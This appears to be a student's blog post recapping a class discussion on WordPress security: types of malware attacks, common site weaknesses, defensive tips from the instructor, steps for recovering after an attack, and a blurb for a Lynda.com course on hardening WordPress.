This week’s chat topic was about WordPress Security. We were assigned to read the following website article and answer the subsequent questions.
What kinds of attacks are there?
There are two types of malware attacks aimed at WordPress:
Injections – your website code is injected with advertisements or links to another site.
Back Doors – successful attack places a shell script (back door) on your server allowing them to access your site and run commands without a login.
What mistakes are people making that make their sites vulnerable?
Environment – system/server may not be configured correctly or following best practices
Administration – too easy of a login/password to site
Vulnerabilities – outdated versions of PHP, WordPress, themes or plugins
What are 3 things you WILL do now?
Ensure a good username and strong password.
Backup site every night, keeping copies off-site.
Install a Firewall.
What are 3 things you won’t do now, but maybe later?
Research web frequently about the new ways hackers are operating.
Know what malware remediation services are available in the event you need them.
Upgrade to the latest version of WordPress when feasible.
Our chat centered around a discussion about a student who lived through the nightmare of having all his WP sites hacked at work – what he learned from this and how he handled the situation.
A student provided a resource that offers some great tips about security:
Genius Guide WordPress – Master the expert skills needed to create better blogs
Our instructor provided these great security tips:
1) Use good usernames and strong passwords. (Consider using a password manager like 1password or LastPass.)
2) Backup everything every night and keep the copies of the backups off-site.
3) Least privileged users, system configuration, ModSecurity. Research on the web to find ways to prevent common exploits.
4) Firewalls like CloudFlare or Incapsula.
5) Scans that look for damage and clean up the mess: Securi and VaultPress.
6) Use a hosting service that is legit.
Recovery after an Attack…
1) Alert your host. They should take care of this for you; if they don’t, find a new host.
2) Replace all core WordPress files.
3) Start at all index.php files and move inward inspecting each theme/plugin file for code that looks out of place.
4) Hire a malware remediation service to help.
5) Restore from your backup.
This course explains how to secure self-hosted WordPress sites, including site configuration, code modification, and the use of free plug-ins. Beginning with the basics of site security, author Jeff Starr explains how to harden a WordPress site by configuring authentication keys, setting proper file permissions, and removing version numbers. The course shows how to implement a firewall, prevent automated spam, and control proxy access, and concludes with a series of advanced tips and site security best practices.
- Backing up and restoring your site
- Setting up strong passwords
- Choosing trusted plugins and themes
- Protecting the configuration file and the admin directory
- Securing the login page
- Fighting comment spam
- Blocking access and detecting hacks
- Finding and reporting vulnerabilities
Note: You have to be a member of Lynda.com to view the entirety of the tutorials.